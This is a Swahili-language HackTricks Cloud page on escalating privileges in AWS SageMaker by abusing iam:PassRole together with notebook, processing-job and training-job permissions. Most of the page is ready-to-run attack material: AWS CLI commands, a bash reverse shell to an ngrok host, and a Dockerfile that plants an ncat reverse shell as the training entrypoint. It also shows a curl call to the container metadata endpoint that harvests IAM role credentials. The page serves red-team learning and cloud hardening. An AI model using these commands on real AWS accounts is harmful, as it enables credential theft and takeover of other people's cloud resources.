AWS - Sagemaker Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

`iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`

Anza kujenga daftari na Jukumu la IAM ili kupata ufikivu uliowekwa:

aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

Jibu linapaswa kuwa na uga wa NotebookInstanceArn, ambao utaleta ARN ya kifaa cha notebook kilichoundwa. Tunaweza kutumia API ya create-presigned-notebook-instance-url kuzalisha URL ambayo tunaweza kutumia kufikia kifaa cha notebook mara tu itakapokuwa tayari:

aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Nenda kwenye URL na bofya Fungua JupyterLab kulia juu, kisha shuka chini hadi kwenye kichupo cha "Mzinduzi" na chini ya sehemu ya "Nyingine", bonyeza kitufe cha "Terminal".

Sasa niwezekana kupata ufikiaji wa siri wa metadata ya Jukumu la IAM.

Athari Inayowezekana: Privesc kwa jukumu la huduma ya sagemaker lililoelezwa.

`sagemaker:CreatePresignedNotebookInstanceUrl`

Ikiwa kuna madokezo ya Jupyter yanayoendesha tayari na unaweza kuyapata kwa kutumia sagemaker:ListNotebookInstances (au kuyagundua kwa njia nyingine yoyote). Unaweza kuunda URL kwa ajili yao, kuyafikia, na kuiba siri kama ilivyoelezwa katika mbinu iliyopita.

aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Athari Inayowezekana: Privesc kwa jukumu la huduma ya sagemaker lililofungwa.

`sagemaker:CreateProcessingJob,iam:PassRole`

Mshambuliaji mwenye ruhusa hizo anaweza kufanya sagemaker kutekeleza kazi ya usindikaji na jukumu la sagemaker lililofungwa. Mshambuliaji anaweza kuonyesha ufafanuzi wa chombo ambacho kitakachofanywa katika kifaa cha akaunti ya AWS iliyosimamiwa na ECS, na kuiba vibali vya jukumu la IAM vilivyofungwa.

# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Athari Inayowezekana: Privesc kwa jukumu la huduma ya sagemaker iliyotajwa.

`sagemaker:CreateTrainingJob`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizo ataweza kuunda kazi ya mafunzo, kupiga chombo cha aina yoyote nacho kina jukumu limeambatanishwa nalo. Hivyo basi, mshambuliaji ataweza kuiba vibali vya jukumu.

Hali hii ni ngumu zaidi kuitumia kuliko ile ya awali kwa sababu unahitaji kuzalisha picha ya Docker itakayotuma rev shell au vibali moja kwa moja kwa mshambuliaji (hauwezi kutoa amri ya kuanza katika usanidi wa kazi ya mafunzo).

# Create docker image
mkdir /tmp/rev
## Note that the trainning job is going to call an executable called "train"
## That's why I'm putting the rev shell in /bin/train
## Set the values of <YOUR-IP-OR-DOMAIN> and <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Upload it to ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest

```bash # Create trainning job with the docker image created aws sagemaker create-training-job \ --training-job-name privescjob \ --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \ --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \ --role-arn \ --output-data-config '{"S3OutputPath": "s3://"}' \ --stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

**Athari Inayowezekana:** Privesc kwa jukumu la huduma ya sagemaker iliyotajwa.

## `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`

Mshambuliaji mwenye ruhusa hizo (kwa uwezekano) ataweza kuunda **kazi ya mafunzo ya hyperparameter**, **kukimbia chombo cha aina yoyote** kwenye hiyo na **jukumu limeambatishwa** nayo.\
_Sijachunguza kwa sababu ya ukosefu wa muda, lakini inaonekana kama mbinu za zamani, jisikie huru kutuma PR na maelezo ya uvamizi._

# Marejeo
* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)

<details>

<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

PreviousAWS - S3 Privesc NextAWS - Secrets Manager Privesc

Last updated 2 months ago